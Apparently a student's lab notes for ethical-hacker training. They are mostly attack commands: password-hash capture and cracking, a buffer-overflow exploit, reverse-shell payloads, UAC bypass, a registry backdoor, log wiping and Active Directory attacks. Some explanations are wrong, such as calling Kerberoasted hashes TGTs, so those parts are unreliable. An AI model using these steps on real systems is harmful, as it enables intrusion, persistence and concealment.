Module 06: System Hacking

Lab 1: Gain Access to the System

Task 1: Perform Active Online Attack to Crack the System’s Password using Responder

### Step -1 : Using Responder on ParrotOS
    sudo responder -I eth0
        Capturing the hash via logging into : 
            run (Win+R) --> //CEH-Tools

## Step  -2 : Cracking hash using JohntheRipper
    john <input_file.txt>
    

Task 2: Gain Access to a Remote System using Reverse Shell Generator

Step -1 :  Reverse shell generator 
    1.1 : Running reverse shell generator on docker : 
        docker run -d -p 80:80 reverse_shell_generator
    1.2 : Reverse shell generator on web : 
        https://www.revshells.com

Step -2 : Modules used for cracking : 
    1. Msfvenom
    2. HoaxShell

Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System

1. Setting Up the Vulnerable Server

• Objective: Launch the vulnserver application on a Windows 11 machine to simulate a vulnerable service for testing buffer overflow attacks.

• Steps:

  • Restart the machine and log in as the admin user.

  • Navigate to the vulnserver.exe file and run it as an administrator.

  • Configure Windows Security settings to allow access, ensuring the server runs without firewall interference.

Explanation: vulnserver is a deliberately vulnerable program used to practice exploitation techniques, like buffer overflow, in a controlled environment. Running it as an administrator and allowing network access ensures it functions correctly.

---

2. Installing and Setting Up Immunity Debugger

• Objective: Use Immunity Debugger to monitor and analyze the behavior of the vulnerable application.

• Steps:

  • Install Immunity Debugger and Python (required for running debugger scripts).

  • Launch Immunity Debugger and attach it to the vulnserver process.

  • Change the debugger status to "Running."

Explanation: Immunity Debugger allows you to observe application memory, register states, and interactions with system resources. Attaching it to vulnserver facilitates the identification of vulnerabilities like buffer overflows.

---

3. Establishing a Connection with Netcat

• Objective: Test the vulnserver functionality using Netcat from the Parrot Security machine.

• Steps:

  • Connect to the vulnserver using the nc -nv <IP> 9999 command.

  • Test commands like HELP and EXIT to verify server responses.

Explanation: Netcat is a versatile tool for network diagnostics and testing. In this context, it’s used to verify that the vulnerable server is accessible and responds to commands.

Commands used : 
nc -nv 10.10.1.11 9999

---

4. Performing Spiking

• Objective: Identify vulnerable functions in the server by sending malformed inputs.

• Steps:

  • Create spike scripts for specific functions (STATS and TRUN).

  • Use the generic_send_tcp tool to send these scripts to the server and observe responses in Immunity Debugger.

Explanation: Spiking involves crafting specific inputs to test server functions for buffer overflow vulnerabilities. The debugger's status change to "Paused" indicates a possible vulnerability.

Files to be made to check Spikes : 
1. Using Spikes [STATS]
    s_readline();
    s_string(“STATS ”);
    s_string_variable(“0”);
2. Using Spikes [TRUN]
    s_readline();
    s_string(“TRUN”);
    s_string_variable(“0”);
    
## Commands to be used :
1. generic_send_tcp stats.spk 0 0
2. generic_send_tcp trun.spk 0 0

---

5. Conducting Fuzzing

• Objective: Send a large volume of data to identify the exact buffer size that causes an overflow.

• Steps:

  • Use Python scripts to send incrementally larger payloads to the vulnerable function.

  • Note the size of the payload when the server crashes.

Explanation: Fuzzing determines the threshold at which a buffer overflow occurs, helping pinpoint the exploit size. The overflow size is critical for crafting an exploit.

## Commands used : 
sudo chmod +x fuzz.py
./fuzz.py

---

6. Generating and Identifying Offsets

• Objective: Determine the exact location of the overflow within the memory (EIP register).

• Steps:

  • Use pattern_create.rb to generate a unique payload.

  • Overwrite the server with the pattern and use pattern_offset.rb to calculate the EIP offset.

Explanation: The EIP register controls execution flow. Identifying its offset ensures you can control execution by overwriting the register with malicious shellcode.

## Commands used :
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <nearest offset value eg: 10400>

### Replace the generated offsets into the file findoff.py
    sudo chmod +x findoff.py
    ./findoff.py
    
Note down the random bytes in the EIP and find the offset of those bytes.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 10400 -q 386F4337

## Checking wheather we can override the function to exec commands
sudo chmod +x overwrite.py
./overwrite.py

---

7. Locating Bad Characters

• Objective: Identify characters that could disrupt the exploit payload.

• Steps:

  • Send all possible byte values to the server and analyze memory dumps for discrepancies.

Explanation: Bad characters, like null bytes (\x00), can terminate strings prematurely, corrupting payloads. Removing these ensures a reliable exploit.

## Commands used : 
sudo chmod +x badchars.py
./badchars.py

# Read the ESP values offset generated and select "Follow in Dump" by right clicking on the offset

---

8. Identifying Vulnerable Modules

• Objective: Find server modules lacking security protections, such as ASLR or DEP.

• Steps:

  • Use mona.py in Immunity Debugger to list modules and their memory protections.

  • Identify a module (e.g., essfunc.dll) without protections.

Explanation: Exploiting a module without memory protections simplifies the attack, as it ensures predictable memory addresses.

### Commands used :
!mona modules
## Run the below code after executing converter.py section 9
!mona find -s “\xff\xe4” -m essfunc.dll

---

9. Finding a JMP ESP Address

• Objective: Locate an instruction (JMP ESP) to redirect execution to the payload.

• Steps:

  • Use mona.py to find a usable JMP ESP instruction in the identified module.

  • Convert the address to hexadecimal for use in the exploit.

Explanation: A JMP ESP instruction is crucial for redirecting execution to the payload stored on the stack.

## Commands used : 
python3 converter.py
The Enter the assembly code here : prompt appears; type JMP ESP and press Enter.
The result appears, displaying the hex code of JMP ESP (here, ffe4).

---

10. Crafting and Running the Exploit

• Objective: Inject malicious shellcode to achieve control of the target machine.

• Steps:

  • Write a Python script that includes the calculated offset, JMP ESP address, and malicious shellcode.

  • Send the crafted payload to the server and verify execution control via Immunity Debugger.

Explanation: By overwriting the EIP and injecting shellcode, you gain control over the vulnerable application, demonstrating the exploitation of the buffer overflow vulnerability.

## Commands used : 
msfvenom -p windows/shell_reverse_tcp LHOST=[Local IP Address] LPORT=[Listening Port] EXITFUNC=thread -f c -a x86 -b “\x00”
Copy the shell code generated & edit the shell_code.py file
type b in the begining of every line to convert strings to bytes 

## Starting listening service
nc -nvlp 4444

## Executing Payload
sudo chmod +x shellc_ode.py
./shell_code.py

---

Lab 2: Perform Privilege Escalation to Gain Higher Privileges

Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys

## Payload Crafting using msfvenom: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Windows.exe
Share the payload into the vulnerable machine

## MSF Console
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST & LPORT
exploit

As the result 1 meterpreter shell will be opened and now we will excelate the priviledges using bypassing UAC

## Backgrounding sessions: 
background
## using BypassUAC by fodhelper
use exploit/windows/local/bypassuac_fodhelper
    set sessions 1
    set TARGET 0
    set LHOST & LPORT
    exploit
## once session is upgraded we will pass the UAC
    getsystem -t 1
    background

## Now we will use stickykeys to open root shell 
use post/windows/manage/sticky_keys
set session 2
expolit

## Now on the login screen of windows try clicking shift to 5 times and shell will be opened

---

Lab 3: Maintain Remote Access and Hide Malicious Activities

Task 1: User System Monitoring and Surveillance using Spyrix

Use the temp mail to signup
use to same mailid to for agents and server for config

Task 2: Maintain Persistence by Modifying Registry Run Keys

Registry keys labeled as Run and RunOnce are crafted to automatically run programs upon each user login to the system. The command line specified as a key's data value is restricted to 260 characters or fewer. If attackers discover a service connected to a registry key with full permissions, they can execute persistence attacks or exploit privilege escalation. Upon any authorized user's login attempt, the associated service link within the registry triggers automatically.

Commands used : 
1. Initial Access file : 
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe

2. Persistent access file : 
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe

## msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST & LPORT
background

use exploit/windows/local/bypassuac_silentcleanup
set TARGET 0
SET LHOST & LPORT
getsystem -t 1 

## Modifying the registry
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"

---

Lab 4: Clear Logs to Hide the Evidence of Compromise

Task 1: Clear Windows Machine Logs using Various Utilities

Softwares used : 
Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher

## wevtutil Usage : 
wevtutil el
wevtutil el <log_name>
wevtutil cl
wevtutil cl <logname>

## Cipher Usage : 
cipher /w: <Disk or Folder or File>

Task 2: Clear Linux Machine Logs using the BASH Shell

## Commands used : 
export HISTSIZE=0 # It disables the logging
history -c # it cleares the history
history -w # it cleares the history of current shell
shred ~/.bash_history # shreads the file 

---

Lab 5: Perform Active Directory (AD) Attacks Using Various Tools

Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name

## Commands used : 
nmap -T4 -A -v <IP>

Task 2: Perform AS-REP Roasting Attack

## Commands used : 
cd /impacket/examples
python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22
## Cracking the hashes
john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt

Task 3: Spray Cracked Password into Network using CrackMapExec.

## Commands used : 
cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p “cupcake” 

Task 4: Perform Post-Enumeration using PowerView

## Commands used : 
powershell -EP Bypass
 . .\PowerView.ps1 to run the script

• Get-NetComputer command in PowerShell. This command will display all the information related to computers in AD.

• Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.

• Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships.

• Get-NetOU - Lists all organizational units (OUs) in the domain.

• Get-NetSession - Lists active sessions on the domain.

• Get-NetLoggedon - Lists users currently logged on to machines.

• Get-NetProcess - Lists processes running on domain machines.

• Get-NetService - Lists services on domain machines.

• Get-NetDomainTrust - Lists domain trust relationships.

• Get-ObjectACL - Retrieves ACLs for a specified object.

• Find-InterestingDomainAcl - Finds interesting ACLs in the domain.

• Get-NetSPN - Lists service principal names (SPNs) in the domain.

• Invoke-ShareFinder - Finds shared folders in the domain.

• Invoke-UserHunter - Finds where domain admins are logged in.

• Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.

Task 5: Perform Attack on MSSQL service

Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt.

echo "SQL_srv" >> user.txt

Now we wil use hydra to execute password spray on the user and get the password of the user SQL_srv

hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql

Now using the script to get the database

python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';

Now, as we know that xp_cmdshell is enabled on SQL server we can use Metasploit to exploit this service. Type exit and press Enter; then execute the command msfconsole to launch Metasploit.

Msfconsole
    use exploit/windows/mssql/mssql_payload
    set RHOST 10.10.1.30
    set USERNAME SQL_srv
    set PASSWORD batman
    set DATABASE master
    exploit

Task 6: Perform Privilege Escalation

## Scripts used : 
./winpeas.exe

Task 7: Perform Kerberoasting Attack

Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract ticket granting ticket (TGT) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). TGTs are requested from the DC for these accounts, then cracked offline to reveal user passwords. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication.

rubeus.exe kerberoast /outfile:hash.txt
hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt

• -m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes.

• --force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.

• -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.

• hash.txt: is the input file containing the hashes to crack

• /root/ADtools/rockyou.txt: is the wordlist file used for the attack